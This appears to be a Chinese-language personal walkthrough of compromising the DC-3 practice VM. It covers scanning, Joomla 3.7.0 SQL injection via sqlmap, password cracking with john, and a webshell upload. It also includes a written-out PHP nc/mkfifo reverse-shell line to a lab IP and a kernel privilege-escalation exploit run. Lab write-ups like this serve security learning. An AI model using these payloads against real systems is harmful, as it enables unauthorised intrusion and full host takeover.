愉悦的DC-3靶机

网上的其余DC-3WP其实有写的比我还好的,写本篇也只是我个人的记录,打靶机确实挺好玩的不是吗:)

前期交互:略

信息收集

扫描开放端口与常见漏洞存在

Nmap -sV 192.168.218.189 --script=vuln

扫出joomla有sql注入漏洞

扫描隐藏目录

dirsearch -u 192.168.218.189

发现有后台登录界面与静态目录页面(http://192.168.218.189/templates/beez3/html/)

其实信息收集在探测目录时,也可以自己下载对应的模板,比如这里是beez3,那就自己下一个,因为默认的目录都是不会更改的.

进行指纹识别

Whatweb -v 192.168.218.189

尝试使用专扫工具,也成功扫出版本

Joomscan --url 192.168.218.189

Msf搜索joomla的3.7.0版本

以下不应该出现在信息收集报告里的,但出于学习目的,我写了下来:

Locate 42033   //查看路径

然后cp后cat,就看到了sqlmap的实例使用

威胁建模

主机192.168.218.189的3.7.0版本的joomla的威胁建模

目的:为后续的渗透测试建设攻击链

        通过nmap发现了针对joomla 3.7.0版本的编号CVE-2017-8917的sql注入漏洞,同时通过目录扫描,发现后台登录界面,可以尝试sql注入攻击,从而获得后台管理员账户

方法:sql注入

        Sql注入探测,采用sqlmap

        Sqlmap使用步骤由sqlmap提供的实例使用

软件:

        Kali

        Sqlmap

漏洞分析

根据威胁建模,选择用sqlmap进行探测是否可以利用已知漏洞

测试成功,可以探测到数据表名字

渗透测试

通过漏洞分析,发现确实存在sql注入,通过修改sqlmap提供的实例最后的--dbs,逐步探测数据库内容,

得到admin账户,但是是加密的,思路暂时没有了,通过查询资料,发现john可以尝试破解密码,故使用john破解密码

得出密码snoopy

到这里,应该重新对这个页面做信息收集,但是这样太麻烦了,我就直接开始信息收集,边收集边渗透了

在经过枚举测试(心虚),发现

这里存在文件上传漏洞

长传一句话木马尝试蚁剑连接(木马路径看之前的静态目录)

成功连接了,接下来是反弹shell到kali上,但是蚁剑上的shell环境连复制粘贴都不行,这么长一串反弹shell代码,怎么办?可以用刚刚的上传漏洞,上传一个php反弹webshell,

<?php

eval(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.218.176 1234>/tmp/f)

?>

成功反弹shell

由于nc反弹的shell不好用，下面通过python来建立交互式shell(为什么想到用python,是因为linux很多版本都自带python环境,当然也有其他的方式,这里不说了)

交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

或者

python -c 'import pty; pty.spawn("/bin/bash")'

后渗透测试

提权属于后渗透测试

因为用不了sudo -l同时也没有mysql等,尝试系统提权,先发现系统版本(为什么会想到系统,简单的说就是因为作者在welcome DC-3里说root的时候提到了和你的system,往难了说,经验bushi)

Msf发现漏洞

选择这个,

Cat看看如何使用

根据使用实例,要上传文件,正好利用蚁剑上传

上传成功,解压

通过反弹shell进行解压，unzip 39772.zip

切换到39772目录， cd 39772

解压exp tar -xvf exploit.tar

切换shell存放的目录，cd ebpf_mapfd_doubleput_exploit

执行提权

./compile.sh

./doubleput

提权成功

报告:略

DC-3安装:

dc-3安装会提示磁盘分区不对,提示要在0:0区域

改一下就好了,兼容性不行就调成16版本

链接：https://pan.baidu.你com/s/170P8wG_ZuaOC好Ale4FZN3BQ?pwd=zlmn
提取码：zlmn